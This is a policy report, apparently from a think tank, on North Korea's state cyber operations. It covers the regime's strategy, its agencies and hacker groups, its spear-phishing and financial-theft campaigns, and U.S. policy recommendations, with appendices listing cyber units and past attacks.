North Korean missiles and nuclear weapons have garnered fear, international condemnation, and tough sanctions. Pyongyang’s cyber activities, however, have elicited less reaction and punishment despite having been used repeatedly in attacks against governments, financial institutions, and industries.
The attitude of experts toward North Korea’s cyber capabilities was initially dismissive, just as their reaction to the regime’s nuclear and missile programs had been. Many, pointing to the famous nighttime satellite imagery of northeast Asia with a dark North Korea surrounded by the blazing lights of its neighbors, did not believe that the technologically backward regime was capable of sophisticated cyberattacks.
Nevertheless, although the regime fails to provide technological comforts for its populace, Pyongyang developed an advanced cyber warfare prowess that is surpassed by few nations. From initial rudimentary distributed denial-of-service (DDoS) attacks against South Korea, the regime improved its cyber programs to create a robust and global array of disruptive military, financial, and espionage capabilities.
As its cyber proficiencies evolved, Pyongyang implemented ever more sophisticated techniques and prioritized financial targets to evade international sanctions and augment the regime’s coffers for its nuclear and missile programs. Although it appears to have de-emphasized cyber operations against military and infrastructure targets in recent years, the regime previously alluded to attacking allied info-centric warfare strategies and civilian networks during a crisis.
The scope of North Korea’s demonstrated cyber capabilities and the severity of other recent cyberattacks, such as the Russian-sponsored SolarWinds hack, Chinese exploitation of Microsoft Exchange vulnerabilities, and DarkSide malware shutting down of the Colonial Pipeline, demonstrate the continued critical vulnerability of the government, financial, infrastructure, and corporate sectors. The United States, in conjunction with foreign governments and the private sector, needs to augment cyber defenses and respond more forcefully to attacks. Failure to do so enables North Korea to continue undermining the effectiveness of international sanctions and leaves the United States and its partners exposed to a potentially devastating cyberattack in the future.
Cyber: A Key Component of North Korean Strategy
Pyongyang has developed a comprehensive and sophisticated arsenal of cyberattack tools and methods. In 2017, senior U.S. intelligence officials assessed that North Korea was one of the top four cyber threats capable of launching “disruptive or destructive cyberattacks” against the United States. The Director of Central Intelligence warned in January 2019 that North Korea “poses a significant cyber threat to financial institutions, remains a cyber-espionage threat, and retains the ability to conduct disruptive cyber attacks.”
North Korea’s cyber weapons and tactics are consistent with the regime’s asymmetric military strategy. As North Korea’s conventional military forces deteriorated in comparison with those of the United States and South Korea, Pyongyang developed new weapons to counter the growing gap in capabilities, including nuclear weapons, missiles, and long-range artillery.
After studying U.S. military operations in Iraq, North Korean leader Kim Jong-il concluded that allied high-tech warfare was vulnerable to cyberattacks and that “in the 21st century, war will be [fought as] information warfare.” Kim opined that “cyber attacks are like atomic bombs” and that “[w]ar is won and lost by who has greater access to the adversary’s military technical information in peacetime.”
North Korean strategists see cyberspace as an integral part of its military strategy, designating it “the fifth major battlefield” along with ground, air, sea, and space. By 2009, Kim declared that North Korea was “fully ready for any form of high-tech war.” The South Korean Ministry of Defense warned that North Korea was able to disrupt Global Position System (GPS) networks and was developing the means to jam high-tech missiles and precision-guided bombs.
Kim Jong-il initiated North Korea’s foray into cyber warfare, but it was during Kim Jong-un’s reign that Pyongyang accelerated and expanded its cyberattacks on a broader spectrum of targets. Since 2010, North Korea is believed to have jammed the GPS systems of planes over Incheon Airport; stopped the release of a major motion picture in the United States; hacked into South Korean banks, newspapers, and nuclear power plants; and defrauded banks and cybercurrency exchanges to gain billions of dollars.
“With intensive information and communication technology, and the brave Reconnaissance General Bureau (RGB) with its [cyber] warriors,” Kim declared in 2013, “we can penetrate any sanctions for the construction of a strong and prosperous nation.” It is noteworthy that even then, Kim highlighted the financial sanctions–evading aspect of cyber operations.
Kim Jong-un declared that cyber warfare is a “magic weapon” and an “all-purpose sword that guarantees the North Korean People’s Armed Forces ruthless striking capability, along with nuclear weapons and missiles.” In the run-up to a crisis or as an alternative to kinetic strikes, the regime could conduct cyberattacks on government and civilian computer networks that control communications, finances, and infrastructure such as power plants and electrical grids.
Cybercrime: New Methods for Old Strategy
North Korea’s cyber operations are consistent not only with its asymmetric military strategy, but also with the regime’s long history of using criminal activities to acquire money. Earlier criminal efforts included counterfeiting of currencies, pharmaceutical drugs, and cigarettes; production and trafficking of illicit drugs, including opium and methamphetamines; trafficking in endangered species products; and insurance fraud.
Cybercrimes enable the North Korean regime to gain currency and evade international sanctions in ways that are more efficient, cost-effective, and lucrative than past illicit activities and more recent smuggling and ship-to-ship transfers of oil. The regime’s cybercrimes are global in scope, provide astronomical returns on investment, and are low-risk since they are difficult to detect and attribute with little likelihood of international retribution. There have been very few United Nations (U.N.) or U.S. sanctions imposed or legal actions taken against North Korean cyber groups. Cybercrime is especially beneficial to the regime as it faces the cumulative effects of international sanctions and the impact of self-imposed COVID restrictions on legal and illicit foreign trade, as well as natural disasters in the agricultural heartland and decades of devastating socialist economic policies.
Cybercrime Eclipsing Traditional Crimes. As the international community cracked down on North Korea’s various criminal endeavors, the beleaguered regime shifted toward new ways to gain money. Cyber operations are now a greater component of North Korean criminal activities than earlier, more traditional “bricks and mortar” endeavors such as counterfeiting and smuggling. North Korea’s hackers “have become the world’s leading bank robbers,” in the words of John Demers, head of the National Security Division of the U.S. Department of Justice. “Simply put, the regime has become a criminal syndicate with a flag, which harnesses its state resources to steal hundreds of millions of dollars.”
As with any criminal activity, it is difficult to assess how much North Korea has gained from its cybercrime operations. Governments, financial institutions, and law enforcement agencies may be unaware of some cybercrimes or unable to determine the perpetrator conclusively. Even with a successful cybercrime, North Korean hackers may not have been able to convert all of the cryptocurrency into hard cash, and some victimized financial institutions were able to recover some or all of their lost currency.
In August 2019, the U.N. Panel of Experts estimated that North Korea had cumulatively gained $2 billion from cybercrime. For comparison, in 2019, North Korea legally imported $2.7 billion in assorted civilian merchandise, mostly from China, and its annual gross domestic product (GDP) was $29 billion.
A South Korean organization has estimated that North Korean cybercrimes generate an annual revenue of $860 million, but others assess that Pyongyang may gain $1 billion a year—a third of the value of the nation’s exports—from cyber heists. During 2017–2018, North Korea was estimated to account for 65 percent of all global cybercrime. One regime hacking unit, the Lazarus Group, is assessed to have gained more than $1.75 billion worth of cryptocurrency.
In September 2018, a grand jury issued an indictment of North Korean cyber operative Park Jin-hyok for attempted cyber heists and extortions in Asia, Africa, North America, and South America totaling $1.3 billion during 2015–2018. In 2020, the U.S. Department of Justice declared that North Korean hacking of virtual currency exchanges and related money laundering “poses a grave threat to the security and integrity of the global financial system.”
North Korean Cyber Agencies
Pyongyang has an expansive array of government organizations and affiliated hacker groups conducting malicious cyber operations. Organizations appear to have specified missions, although there also appear to be overlap or changes in mission over time. The shadowy nature of covert cyber groups, as well as fragmentary and conflicting information, makes a definitive understanding difficult.
The predominant government organizations for cyber operations are the Reconnaissance General Bureau and the General Staff Department. Both are subordinate to the State Affairs Commission, which is chaired by Kim Jong-un, and have numerous subordinate units. Other government units include the State Security Department and the Defense Commission.
In additional to government agencies, numerous affiliated North Korean hacker groups are conducting attacks against government, financial, infrastructure, and other sectors. These groups include:
- The Chollima groups;
- Dark Hotel;
- Group 123;
- The Kimsuky group;
- Lazarus (also known as APT38);
- Reaper (also known as APT37 and Thallium); and
The U.S. government refers to the North Korean government’s malicious cyber activity collectively as Hidden Dragon.
North Korea’s Illicit Cyber Operations
Cyber operations provide new methods and tools that Pyongyang can use to fulfill its long-standing objectives of espionage, disruptive and destructive operations, extortion and terrorism, illicit money-making activities, and evasion of sanctions. North Korean hackers have penetrated computer networks to:
- Collect intelligence on and steal secrets from defense, military technology, intelligence, financial, nuclear, and pharmaceutical targets;
- Disrupt, damage, and destroy computer systems through DDoS attacks;
- Deploy ransomware to encrypt data or files to hold computer systems hostage until extortion payments or other demands were met, sometimes in conjunction with violent physical attacks, as well as running cyber protection rackets whereby North Korean cyber groups will refrain from attacking entities in return for payment;
- Retaliate against opponents of the regime or those who demean North Korean leaders; and
- Illegally acquire and launder stolen money to evade sanctions and raise funds for the cash-strapped regime by cyberattacking banks, financial institutions, cryptocurrency exchanges, and the SWIFT (Society for Worldwide Interbank Financial Telecommunication) network.
Tactics, Techniques, and Procedures
North Korean hackers are adept at developing sophisticated cyber coding to gain access even to well-protected government, military, and financial computer networks. They are also astute at exploiting human vulnerabilities through social engineering methods to trick victims into uploading malware that compromises network security.
Hackers seek access in much the same way that intelligence agencies recruit human assets. Like intelligence agencies, they ascertain the information and organizations that would achieve government-directed objectives, conduct reconnaissance to identify individuals that could provide access to that information, assess vulnerabilities and the means by which to exploit them, and determine which methods they can use to exfiltrate the data.
North Korea often delivers malware through spear-phishing emails targeted at people who can provide either direct or tertiary access to a target network. While many of these attempts are variants on “please click on the (infected) attachment,” the means employed to allay the target’s suspicions have become increasingly clever. The hackers use “spoofing” tactics to disguise an email, social media account, or website so that it appears to be from a recognized reliable source so that the target will unwittingly upload malware. The approaches are often individually customized and highly profiled, using personal information either about the target or about individuals or organizations that the target would trust.
In Operations Dream Job, In(ter)ception, North Star, and WannaJob, North Korea targeted Australian, Indian, Israeli, Russian, South Korean, and U.S., defense and aerospace experts to gain classified or proprietary information by using fake job offers from defense contractors as lures to install data-gathering implants on the victims’ systems. The cyber groups impersonated job recruiters by creating fictitious WhatsApp, Facebook, and LinkedIn profiles of legitimate companies and even conducted extensive dialogue through email and phone calls.
Similar techniques were used against employees of banks, companies, and other organizations to gain access to computer networks. North Korean groups will mimic colleagues, friends, journalists, or Korea-related organizations to gain access to a victim’s computer and then use acquired information or contact lists to conduct follow-on approaches. The groups have even commissioned experts to write papers that were then used as bait when targeting other experts.
Hackers and intelligence agencies also welcome targets that offer themselves as sources. A “walk-in” intelligence source walks into an embassy or otherwise contacts a government source to volunteer his or her services without having been previously targeted. Hackers conduct “watering hole” attacks by either infecting or creating websites that potential sources are likely to visit.
The hackers can create infected documents or links and wait for someone to arrive and unknowingly take the bait. In 2017, North Korean hackers infected the website of the Polish Financial Supervision Authority with malware that was programmed to download to computers that visited the site only if they were from 104 preselected financial institutions and telecommunications companies.
Once a source has provided access, the available information, including information on possible access to other potential targets, is investigated and vetted for its usefulness. North Korean hackers may spend nine to 18 months conducting reconnaissance, elevating user privileges, and disabling security procedures before attempting to execute a cybertheft. North Korean hackers are seen as unique in their willingness to destroy large amounts of data to cover their tracks or distract targets while a theft is in process.
North Korea’s Evolving Cyber Operations
Pyongyang’s cyberattacks developed through several phases. Initially, the regime focused on cyber espionage to steal information and cyberattacks to disrupt or destabilize networks related to national defense, nuclear power plants, infrastructure, telecommunications, media, and corporations. Early cyber operations were a form of “reconnaissance by fire” to test preliminary capabilities against opponents’ defenses and may have served as proof of concept for far more extensive and crippling operations to be used in a time of military conflict or major crisis.
As North Korea improved the scope, scale, and sophistication of its cyber operations, it progressed through phases of cyberterrorism, revenge attacks, and extortion; cyber bank robbery; cryptocurrency exchanges and decentralized finance (DeFi) platforms; and (after the onset of COVID) pharmaceutical companies. The initiation of a new phase did not curtail cyberattacks prevalent in previous phases, although their scope and prioritization might have changed. For example, cyberespionage operations continued after Pyongyang initiated cybercriminal activities to generate revenue.
In 2015, North Korea began cyber robbery operations to gain revenue for the beleaguered, heavily sanctioned regime. Pyongyang began with attacks against traditional financial institutions such as banks, fraudulent forced interbank transfers, and automated teller machine (ATM) thefts. After the international community took notice of these attacks, the regime shifted to targeting cryptocurrency exchanges. By 2020, according to one U.N. member state, North Korean “attacks against virtual currency exchange houses [had] produced more illicit proceeds than attacks against financial institutions” with stronger cyber protections.
Potential North Korean Cyber Actions During a Crisis
North Korea has proven to be adept at deeply penetrating even highly secure computer networks of governments, militaries, banks and international financial transaction systems, and critical infrastructure targets. More worrisome, however, is the possibility that Pyongyang could inflict even greater damage during a crisis or hostilities on the Korean Peninsula. These attacks indicate that Pyongyang has the potential to engage in cyber warfare with disproportionately massive impact—in other words, to create a cyber 9/11.
North Korea could paralyze critical infrastructure systems such as communications, dams, electrical grids, hospitals, nuclear power plants, supply chains, and traffic-control systems. North Korean hackers have targeted railroad companies and airlines, including an automated operating system that controls trains’ speed. Hackers have already jammed airline GPS signals and might seek to gain control of airplane controls.
In 2013, South Korea’s National Intelligence Service (NIS) revealed that Pyongyang had developed a Trojan program to take over computer networks and power supply systems, chemical materials facilities, oil storage terminals, water treatment stations, and subway networks throughout South Korea. The NIS indicated that the regime had recorded the geographic coordinates of South Korean chemical materials facilities, oil storage terminals, water treatment stations, and power plants and that it had collected information on power substations, subway networks and elevated roadways in major cities, tunnels, bridges, and railroad stations.
In 2017, North Korea attempted to use spear-phishing emails to gain entry into U.S. electric companies as an early-stage reconnaissance operation. Computer security firm FireEye reported that the hackers failed to gain access at that time to computer systems or industrial control systems that regulate the supply of power. Nevertheless, the U.S. government has warned that North Korea’s illicit cyber activities “threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system,” in addition to which “[t]he DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure.”
Pyongyang could engage in economic warfare to steal massive amounts of money or undermine the stability of the international financial system or worldwide markets. The regime could conduct ransomware attacks on banks to gain money or to disable or destroy computer networks as well as flood the SWIFT system with fraudulent transactions. In 2019, more than 11,000 SWIFT member institutions worldwide sent approximately 33.6 million transactions per day through the network.
What the United States Should Do
North Korean cyber operations are a strategic threat to the United States, its partners, and the international financial network. Pyongyang’s cybercrimes provide a means to evade sanctions and undermine international efforts to curtail the regime’s prohibited nuclear and missile programs.
Washington needs to make addressing this threat a national priority by establishing a comprehensive whole-of-government strategy, to be coordinated with other governments as well as the private sector. The U.S. should fully enforce existing laws and assess whether additional legislative and executive actions are needed, including enhanced regulations of cybercurrency exchanges and DeFis. Washington should determine a range of punitive steps, both cyber and kinetic, for responding to attacks deemed detrimental to national security.
Specifically, Washington should:
Assess the threat. The Director of National Intelligence should prepare classified and unclassified National Intelligence Estimates defining the extent of North Korean cyber capabilities, past attacks, and the potentially greater threat from future operations, including during a crisis or hostilities on the Korean Peninsula. These reports should be submitted to appropriate committees in Congress.
The U.S. should also continue to issue threat advisories that provide detailed technical details of North Korean cyber organizations, recent cyberattacks, ways to evade cyber defenses, and money laundering in order to alert government and private-sector entities to take appropriate actions to improve cyber defenses. Widespread public dissemination of threat information and private contacts with other governments as well as banks, financial institutions, and companies enable the sharing of more detailed information while still protecting classified sources and methods.
Create a comprehensive national strategy to combat cyber threats. Addressing North Korea’s cyber threat should be a national priority that requires a comprehensive whole-of-government response that uses all of the instruments of national power. Given the expansive nature of Pyongyang’s cyber operations, the effort should be directed by the White House and should include, at a minimum, the Departments of Treasury, Justice, Defense, Commerce, and Homeland Security as well as the Intelligence Community.
It is encouraging that the 2021 National Defense Authorization Act created the position of National Cyber Director to serve as principal adviser to the President on cyber policy. Chris Inglis, a 28-year veteran of the National Security Agency, was confirmed in June 2021 to lead coordination of U.S. cybersecurity policy and strategy implementation; oversee efforts to increase cybersecurity and deter malicious cyber activity; coordinate the federal response to cyberattacks; engage with the private sector; engage in diplomatic efforts to develop norms of and international consensus on responsible state cyber behavior; and support “the integration of defensive cyber plans and capabilities with offensive cyber plans.” Also encouraging was President Biden’s announcement that he would “make cybersecurity a top priority at every level of government…further strengthen partnerships with the private sector, and expand our investment in the infrastructure and people we need to defend against malicious cyberattacks.”
However, questions remain with respect to how the National Cyber Director will interact with other senior officials and organizations with direct or indirect cyber responsibilities. Who will have the clout to direct a coherent, comprehensive policy across vast bureaucratic organizations with overlapping responsibilities and conflicting priorities? Without real authority over departments and agencies, the new cyber director could face some of the same problems that plagued the Director of National Intelligence, whose position was created after the 9/11 attack. If bureaucratic turf battles and inertia are to be overcome, the President will have to make clear who has real authority on cyber policy, particularly as it interacts with national security, economic, and law enforcement policies.
Coordinate with the private sector. Extensive sharing of cyber-threat information among and between the public and private sectors is critical for improving defenses against North Korean and other hackers. Collaboration and coordination enable a more comprehensive assessment of weaknesses in government, industry, business, financial, and infrastructure computer networks as well as proposals for innovative technical or methodological fixes. In conjunction with industry, businesses, and financial institutions, Washington should therefore develop, coordinate, and promulgate cyber rules, regulations, security protocols, and best practices to improve cybersecurity and the resilience of networks.
The Cybersecurity Information Sharing Act authorized the Department of Homeland Security to “encourage robust sharing of useful cybersecurity information among all types of entities—private, Federal, state, local, territorial, and tribal.” The new Office of the National Cyber Director will join existing government bodies in engaging with the private sector, and this will increase the potential for competition, confusion, and industry frustration. Care should be taken to delineate responsibilities among government agencies.
Despite all actions that governments, industries, and banks implement, the weak link will still be the individual employee who inadvertently allows malware to penetrate the system. No matter how strong the castle’s defenses are, one person carelessly allowing the drawbridge to drop down undermines all defenses. With that in mind, organizations should explore technical measures that preclude or reduce the downloading of malware. Preventing North Korean cyber intrusions will require both improved technical defenses and effective measures to thwart the regime’s sophisticated social engineering techniques that induce individuals to upload malware unknowingly into computer systems.
Engage international partners. U.S. defenses are only as strong as the weakest link overseas. The U.S. should continue and expand efforts to coordinate with foreign governments, law enforcement agencies, and financial regulatory agencies at the national level and, through them, regional and domestic partners. There should also be engagement with foreign financial institutions and businesses to disseminate information on North Korean cyber hacking and money-laundering tactics, techniques, and procedures.
The United States should take the lead in multiple fora to establish and ensure compliance with international cybersecurity standards. Such efforts could take place in existing diplomatic entities, such as the United Nations or G20 forum, led by the White House or State Department, as well as with financial and law enforcement organizations.
The U.N. Panel of Experts recommended that financial institutions, including banks and cryptocurrency exchanges, enhance cyber defenses by sharing threat information and best practices through organizations such as the Financial Services Information Sharing and Analysis Center. The Treasury Department’s Office of Foreign Assets Control (OFAC) could take the lead on encouraging and facilitating information sharing among law enforcement and financial institutions. The initiative could be modeled on the Treasury Department’s Financial Crimes Enforcement Network FinCEN Exchange program to enhance the sharing of information on priority illicit finance threats with financial institutions.
Washington should ensure that financial entities either fully comply with existing regulations or risk losing their access to the SWIFT financial transaction network or ability to maintain correspondent accounts in the U.S. financial system.
Given the United States’ extensive intelligence collection capabilities and law enforcement expertise, Washington should dispatch teams overseas to engage with foreign government, law enforcement, financial institutions, and private-sector entities to provide targeted information on North Korean cyber programs. The U.S. did this extensively to counter North Korean evasion of sanctions. Those efforts successfully alerted entities that were unaware of North Korean activities and triggered compliance prior to the issuing of formal U.S. punitive measures.
Fully enforce laws against illicit activities and cyber operations. Despite the severity of Pyongyang’s cyberattacks, the U.S. government has taken action only against a handful of North Korean actors. Unfortunately, this is consistent with actions by successive U.S. Administrations to limit law enforcement efforts against North Korean, Chinese, and other entities that violate U.S. laws and U.N. resolutions. The U.S. government should take action against North Korean hackers as well as countries that enable them to operate from their soil or that provide technology, equipment, or training. This can be done by:
Fully resourcing the sanctions enforcement effort by dedicating sufficient investigative and enforcement effort to it;
Fully enforcing FinCEN regulations that are applicable to cryptocurrency transactions by U.S. nationals or within the United States;
Prohibiting transactions by U.S. nationals or within the U.S. that involve cryptocurrencies the anonymity of which has facilitated illicit transactions on behalf of North Korea;
Amending the North Korea Sanctions and Policy Enhancement Act of 2016 to ban transactions in proceeds derived from cryptocurrency that constitute the proceeds of illicit activity or were involved in carrying out illicit activity; and
Putting greater pressure on host nations to expel or extradite North Korean hackers, including terminating the U.S. Department of Commerce technology export licenses of nations that fail to do so.
Stronger action could constrain North Korea’s ability to gain funding for its prohibited nuclear and missile programs. The Departments of Treasury and Justice should target banks, financial institutions, and front companies that are used to launder money stolen by North Korea. In 2017, the U.S. Congress passed to the Trump White House a list of 12 Chinese banks that were believed to be committing money-laundering crimes in the U.S. financial system. To date, the executive branch has taken no action. In the past, the U.S. imposed $8 billion–$9 billion in fines on European banks that laundered money for Iran, but it has yet to impose any fines on Chinese banks that launder money for North Korea.
Justice Department actions against some North Koreans revealed the extent to which they had moved money illicitly through nine different Chinese banks. The Treasury Department should engage with those banks to discern whether they unwittingly facilitated financial crimes, in which case they should be subject to remedial actions, or were complicit, in which case they should be fined, labelled money-laundering concerns, and denied access to the U.S. financial system. The Bank Secrecy Act, Section 312 of the USA Patriot Act, and other U.S. regulations require U.S. financial institutions to take anti–money laundering measures to ensure that correspondent bank accounts of foreign entities are not used for money-laundering purposes in U.S. financial institutions.
In January 2021, Congress enacted the National Defense Authorization Act for fiscal 2021, which includes the Anti-Money Laundering Act of 2020. The statute updates U.S. anti-money laundering laws, significantly expands the U.S. government’s authority to subpoena documents held by foreign banks overseas, and codifies a $50,000 daily fine for failing to comply with subpoenas. The act also preserves the government’s ability to terminate foreign correspondent accounts in the U.S. financial system, which is a financial “death penalty” for foreign banks that do not comply.
Augment regulation of cryptocurrency exchanges. As banks and financial institutions responded to North Korean cyberattacks, Pyongyang shifted toward cryptocurrency exchanges and DeFis both as targets and as means to launder money. The U.S., in conjunction with other nations, should review existing legislation and regulations that are applicable to cryptocurrency exchanges to ensure sufficient security against cyberattacks and prevent money-laundering.
The U.N. Panel of Experts recommended that member states should implement Financial Action Task Force standards and “that to manage and mitigate the risks emerging from virtual assets,” such assets should be subject to enhanced monitoring and compliance standards. The United States could augment its technical warning notices to include increased emphasis on identifying North Korean attacks, specific actors and their virtual coin “wallets,” and techniques used against cryptocurrency exchanges.
Determine U.S. responses to North Korean cyberattacks. The potential for greater and even catastrophic North Korean cyberattacks against the United States, its partners, and the international financial system raises questions about the proper levels of retaliatory or even preemptive actions against the regime. “[A] good defense isn’t enough,” President Biden has commented; “we need to disrupt and deter our adversaries from undertaking significant cyberattacks in the first place. We will do that by, among other things, imposing substantial costs on those responsible for such malicious attacks, including in coordination with our allies and partners.”
Given North Korea’s limited exposure to cyberattacks, a U.S. or international response would also need to consider non-cyber tools of national power. These include “diplomatic action, cooperation reduction, visa restriction, financial sanctions, legal action, and military action. A consistent pattern of imposing meaningful costs for malicious cyber behavior will strengthen our cyber deterrence if applied consistently, and in some cases, publicly.” A military response to a non-military cyberattack would be a difficult decision, particularly given the difficulty of conclusively assigning blame for cyber operations. In 2014, however, NATO leaders agreed that a large-scale cyberattack on a member country would be considered an attack on the entire alliance, potentially leading to the invocation of Article 5 and triggering a military response. Similarly, the United States and Japan agreed in 2019 that in certain circumstances, a cyberattack could constitute an armed attack for the purposes of Article V of the U.S.–Japan Security Treaty.
The United States should consider discussing with other U.N. member nations whether future North Korean cyberattacks should merit a U.N. Security Council resolution and accompanying sanctions, such as those imposed in response to the regime’s nuclear and missile tests. North Korean cyber groups that commit cybercrimes to evade sanctions and gain funding for the regime’s prohibited nuclear and missile programs could be sanctioned under existing resolutions.
North Korea is a direct threat to the security of the United States, its allies, and the international financial system. Pyongyang continues to augment and refine its nuclear, missile, and cyber threats to the United States and its allies. While its kinetic military attacks have been limited in recent years, the regime has freely engaged in an expansive cyber gray-zone war with much lower risk of retaliation than conventional military actions entail. Pyongyang has conducted cyber guerrilla warfare to steal classified military secrets, has absconded with billions of dollars in money and cybercurrency, has held computer systems hostage, and has inflicted extensive damage on computer networks.
Defending against North Korean cyberattacks requires constant vigilance and rapidly evolving methods and techniques of the sort that law enforcement agencies had to use in response to Pyongyang’s improved tactics for evading sanctions. Complacency or a lack of vigor will leave critical government, military, financial, and industry sectors vulnerable to potentially devastating attacks.
Yet the United States has taken only limited actions against North Korean hackers and foreign countries that allow them to operate and launder money from cybercrimes. Without a firm response from the U.S. to North Korea’s hack of Sony and subsequent threat of terrorism, such attacks against the U.S. and its interests will only grow more common.
Bruce Klingner is Senior Research Fellow for Northeast Asia in the Asian Studies Center, of the Kathryn and Shelby Cullom Davis Institute for National Security and Foreign Policy, at The Heritage Foundation.
Appendix 1: North Korean Government Agencies and Subordinate Groups Conducting Cyber Operations
- Reconnaissance General Bureau (RGB). Formed in 2009 during a restructuring of military and intelligence organizations, the RGB is the primary agency responsible for intelligence, clandestine, and terrorist operations. It includes the majority of North Korea’s cyber units with an estimated 6,800 “trained cyber-warfare specialists.” Subordinate units include:
- Unit 35 (also known as the Central Party Investigative Group), which is responsible for developing malware, identifying opponents’ vulnerabilities, and conducting technical education and training.
- Unit 91, which is responsible for acquiring information and technology on nuclear development and long-range missiles. It has conducted cyberattacks against the South Korean Ministry of Defense and critical national infrastructure targets such as Korea Hydro and Nuclear Power, which operates nuclear and hydroelectric power plants.
- Unit 121 (also known as the Cyber Warfare Guidance Unit), which is North Korea’s largest cyber unit and has both intelligence-gathering and attack components. It is responsible for infiltrating computer networks, hacking secret information, and planting viruses to paralyze enemy networks. It is also responsible for attacking infrastructure networks in the transportation, telecommunications, gas, electric and nuclear power, and aviation sectors and may be responsible for Korea Peoples’ Army jamming operations and the disabling of South Korean command, control, and communications structures during an armed conflict. Unit 121 oversees Unit 91; Lab 110, which manages Offices 35, 98, and 414; Unit 180; 128 Liaison Office; and 413 Liaison Office.
- Lab 110 conducts cyber intelligence missions and cyberattacks against computer command systems. It is believed to have been responsible for the 2009 DDoS attacks against South Korean telecommunications targets. The South Korean National Intelligence Service reported that the unit had received orders to “destroy the South Korean communications networks in an instant.”
- Unit 180 is responsible for hacking international financial institutions to gain foreign currency to support the regime’s nuclear and ballistic missile programs. It has shifted its focus to targeting cryptocurrency exchanges.
- General Staff Department of the Korea Peoples’ Army (GSD). The GSD focuses on the military applications of cyber operations. Its primary cyber goal is to integrate cyber capabilities into North Korea’s warfighting strategy. The GSD’s cyber responsibilities are divided among its:
- Operations Bureau, which creates cyber strategy, force planning, and missions.
- Command Automation Bureau, which conducts cyber warfare operations. Subordinate Units 31, 32, and 56 develop malware development, military software, and command and control software, respectively.
- Enemy Collapse Sabotage Bureau, which conducts information and psychological warfare.
- State Security Department Bureau 225. Bureau 225 produces anti–South Korea propaganda to be disseminated through covert networks in China and Japan as well as hundreds of social media sites. According to South Korea’s National Intelligence Service, Pyongyang seeks to manipulate online opinion by posting articles on blogs or sending emails to South Korean journalists. The unit trains agents, conducts infiltration operations in South Korea, and creates underground political organizations in order to incite disorder. It plays a more traditional intelligence and psychological operations role rather than focusing heavily on cyber operations.
- Defense CommissionPsychological Operations Department Unit 204. Unit 204 engages in cyber-psychological warfare, espionage, and cyberattacks against South Korea and Western targets.
North Korean–Affiliated Hacker Groups
- Lazarus is the largest and most prevalent of North Korea’s hacker groups. It was created in 2007 and is subordinate to Lab 110 of Bureau 121 of the RGB. It has targeted the aerospace, chemical, electronic, entertainment, financial, government, health care, infrastructure, manufacturing, media, military, publishing, and shipping sectors. It also has targeted North Korean human rights organizations in South Korea and Japan. Lazarus was responsible for many of North Korea’s most audacious cyberattacks, including attacks against South Korean banks in 2013, Sony Pictures Entertainment in 2014, and the WannaCry ransomware attack in 2017.
- Kimsuky was created in 2012 with a global intelligence-gathering mission. The organization has extensively targeted U.S., South Korean, and Japanese individuals, think tanks, government agencies, and other organizations focused on Korean security issues, nuclear policy, and sanctions. Kimsuky seeks access to computers to gain information through social engineering tactics such as phishing, credential and password harvesting, and watering hole attacks.
- Reaper (APT38) targets financial institutions and interbank financial systems to obtain money for the regime. Since 2015, APT38 has been linked to attempts to steal hundreds of millions of dollars from financial institutions, including the Vietnam TP Bank (2015); Bangladesh Bank (2016); Far Eastern International Bank (2017); Bancomext (2018); and Banco de Chile (2018).
- Andariel has conducted cyber espionage and cybercrimes against foreign businesses, defense industries, financial institutions, and government agencies since 2015. It has been linked to hacks into ATMs to withdraw cash and steal customer information that it later sells on the black market. Andariel also has developed malware to hack into online poker and gambling sites.
- Bluenoroff conducts cyber heists to generate revenue and enable the regime to evade sanctions. The group was first noticed in 2014 as part of Pyongyang’s new emphasis on financial targets. Bluenoroff has attempted to steal over $1.1 billion from financial institutions and cryptocurrency exchanges in Bangladesh, India, Mexico, Pakistan, Philippines, South Korea, Taiwan, Turkey, Chile, and Vietnam. In conjunction with the Lazarus group, Bluenoroff stole $81 million from the Central Bank of Bangladesh’s New York Federal Reserve account using stolen SWIFT credentials. An attempt by the two groups to steal an additional $851 million was thwarted by an alert bank officer who noticed a typographical error.
- Chollima consists of “four groups, differing in the objectives and methods of attacks:”
- Labyrinth Chollima, which “focuses on countering intelligence services;”
- Ricochet Chollima, which steals user data;
- Silent Chollima, which “acts against the media and government agencies, primarily in South Korea;” and
- Stardust Chollima, which “specializes in ‘commercial attacks.’”
Appendix 2: Compendium of North Korean Cyber Attacks
Phase 1: Espionage and Disruptive/Destructive Attacks
- North Korea’s first DDoS attack appears to have been Operation Flame, which formed the foundation for subsequent attacks using some of the same identifying encryption keys, malware codes, and techniques.
- Large-scale cyberattacks in South Korea included shutting down 400 computers at the transition office of President Lee Myung-bak.
- Operation Troy involved DDOS, espionage, and disk-wiping attacks against South Korean and U.S. government, military, media outlet, and financial websites. Targets included the White House, U.S. Treasury, U.S. Secret Service, and New York Stock Exchange; the South Korean Blue House, Ministry of Defense, and National Assembly; Shinhan Bank and Korea Exchange Bank; and Naver, South Korea’s top internet portal. The attacks came from 435 different servers in 61 countries around the world.
- Cyberattacks jammed GPS signals at Seoul’s Incheon airport.
- Operation Ten Days of Rain targeted 40 South Korean government, media, and financial websites as well as the networks of U.S. Forces Korea and the U.S. Air Force Base in Kunsan. The attack coincided with the annual combined U.S.-South Korea military exercises. The DDoS attacks were highly destructive, requiring a rebuild of operating systems, applications, and user data.
- DDoS attacks on Seoul’s Incheon Airport. South Korean police arrested a South Korean game distributor who had met with North Korean RGB agents in China to acquire computer games infected with malware. South Koreans subsequently playing the games unwittingly uploaded the malware onto their computers enabling them to be used as zombie computers in the cyberattack on the airport.
- South Korean police arrested five people for purchasing malware from North Korean hackers to enable illegally gaining points and in-game special items in popular video games that could be converted into real cash. The group was in regular contact with North Korean agents. In less than two years, the group made $6 million, an unknown portion of which was sent to North Korea.
- Large-scale cyberattacks jammed GPS navigation signals for at least 674 commercial air flights and 122 ships, as well as in-car navigation for a week.
- South Korean conservative JoongAng Ilbo newspaper was attacked and its photo and article databases destroyed. North Korea had previously denounced the newspaper’s articles that were critical of the regime and warned that it would stage military attacks against South Korean media companies. Pyongyang responds forcefully to any perceived insults to its leaders.
- Operation Dark Seoul targeted South Korea’s three largest TV broadcasters (KBS, MBC, and YTN) and three major banks (Nonghyup, Shinhan, and Jeju). North Korean malware erased critical records of 40,000 computers, disrupted operations for days, and caused $700 million in damage.
- The Kimsuky group sent spear-phishing emails targeting two South Korean think tanks, the Sejong Institute and Korea Institute for Defense Analyses, as well as human rights groups, the Ministry of Unification, and U.N. officials.
